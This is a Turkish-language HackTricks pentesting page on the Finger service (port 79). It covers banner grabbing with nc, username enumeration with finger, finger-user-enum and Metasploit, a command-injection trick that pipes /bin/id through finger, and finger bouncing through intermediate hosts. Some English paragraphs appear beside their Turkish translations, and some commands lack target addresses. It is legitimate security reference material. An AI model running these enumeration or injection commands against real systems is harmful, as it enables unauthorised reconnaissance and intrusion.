# 79 - Pentesting Finger
AWS hackleme becerilerinizi sıfırdan ileri seviyeye taşıyın htARTE (HackTricks AWS Kırmızı Takım Uzmanı) ile! HackTricks'ı desteklemenin diğer yolları: * **Şirketinizi HackTricks'te reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI'na**](https://github.com/sponsors/carlospolop) göz atın! * [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin * [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz * 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'u **takip edin**. * **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
## **Temel Bilgiler** **Finger** programı/hizmeti, bilgisayar kullanıcıları hakkında bilgi almak için kullanılır. Genellikle sağlanan bilgiler, **kullanıcının giriş adı, tam adı** ve bazı durumlarda ek bilgileri içerir. Bu ek bilgiler, kullanıcının ofis konumu ve telefon numarası (varsa), kullanıcının oturum açma zamanı, etkinlik dışı kalma süresi (boşta kalma süresi), kullanıcının en son okuduğu posta ve kullanıcının plan ve proje dosyalarının içeriği olabilir. **Varsayılan port:** 79 ``` PORT STATE SERVICE 79/tcp open finger ``` ## **Sorgulama** ### **Banner Yakalama/Temel bağlantı** ```bash nc -vn 79 echo "root" | nc -vn 79 ``` ### **Kullanıcı numaralandırma** User enumeration is the process of gathering information about valid usernames on a target system. This information can be used by an attacker to launch further attacks, such as brute-forcing passwords or attempting to gain unauthorized access to user accounts. Kullanıcı numaralandırma, hedef sistemde geçerli kullanıcı adları hakkında bilgi toplama sürecidir. Bu bilgi, saldırgan tarafından şifreleri kaba kuvvetle kırmak veya kullanıcı hesaplarına izinsiz erişim sağlamak gibi daha fazla saldırı başlatmak için kullanılabilir. One common method of user enumeration is through the Finger service. The Finger service is a network protocol that allows users to retrieve information about other users on a remote system. By default, the Finger service is often enabled on Unix-based systems. Kullanıcı numaralandırmanın yaygın bir yöntemi, Finger servisi aracılığıyla gerçekleştirilir. Finger servisi, kullanıcıların uzak bir sistemdeki diğer kullanıcılar hakkında bilgi almasına izin veren bir ağ protokolüdür. Varsayılan olarak, Finger servisi genellikle Unix tabanlı sistemlerde etkinleştirilir. To perform user enumeration using the Finger service, an attacker can send a query to the Finger service with a specific username. If the username exists on the target system, the Finger service will respond with information about that user, such as their full name, login shell, and other details. Finger servisini kullanarak kullanıcı numaralandırma yapmak için, saldırgan belirli bir kullanıcı adıyla Finger servisine bir sorgu gönderebilir. Eğer kullanıcı adı hedef sistemde varsa, Finger servisi o kullanıcı hakkında bilgileri, tam adı, giriş kabuğu ve diğer ayrıntılar gibi, içeren bir yanıt gönderecektir. To protect against user enumeration through the Finger service, it is recommended to disable or restrict access to the Finger service on the target system. Additionally, implementing strong password policies and monitoring for any suspicious activity can help mitigate the risk of unauthorized access to user accounts. Finger servisi aracılığıyla kullanıcı numaralandırmaya karşı korunmak için, hedef sistemde Finger servisini devre dışı bırakmak veya erişimi kısıtlamak önerilir. Ayrıca, güçlü şifre politikaları uygulamak ve herhangi bir şüpheli faaliyeti izlemek, kullanıcı hesaplarına izinsiz erişim riskini azaltmaya yardımcı olabilir. ```bash finger @ #List users finger admin@ #Get info of user finger user@ #Get info of user ``` Alternatif olarak, [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum) adresinden **finger-user-enum** kullanabilirsiniz, bazı örnekler: ```bash finger-user-enum.pl -U users.txt -t 10.0.0.1 finger-user-enum.pl -u root -t 10.0.0.1 finger-user-enum.pl -U users.txt -T ips.txt ``` #### **Nmap, varsayılan komut dosyalarını kullanmak için bir komut dosyası çalıştırır** ### Metasploit, Nmap'tan daha fazla hile kullanır ``` use auxiliary/scanner/finger/finger_users ``` ### Shodan * `port:79 USER` ## Komut yürütme ```bash finger "|/bin/id@example.com" finger "|/bin/ls -a /@example.com" ``` ## Parmak Yönlendirme [Bir sistem kullanarak parmak yönlendirme yapın](https://securiteam.com/exploits/2BUQ2RFQ0I/) ``` finger user@host@victim finger @internal@external ```
AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenmek için htARTE (HackTricks AWS Kırmızı Takım Uzmanı)'ı öğrenin! HackTricks'ı desteklemenin diğer yolları: * **Şirketinizi HackTricks'te reklamını görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARINA**](https://github.com/sponsors/carlospolop) göz atın! * [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin * [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz * 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'u **takip edin**. * **Hacking hilelerinizi HackTricks ve HackTricks Cloud** github depolarına **PR göndererek paylaşın**.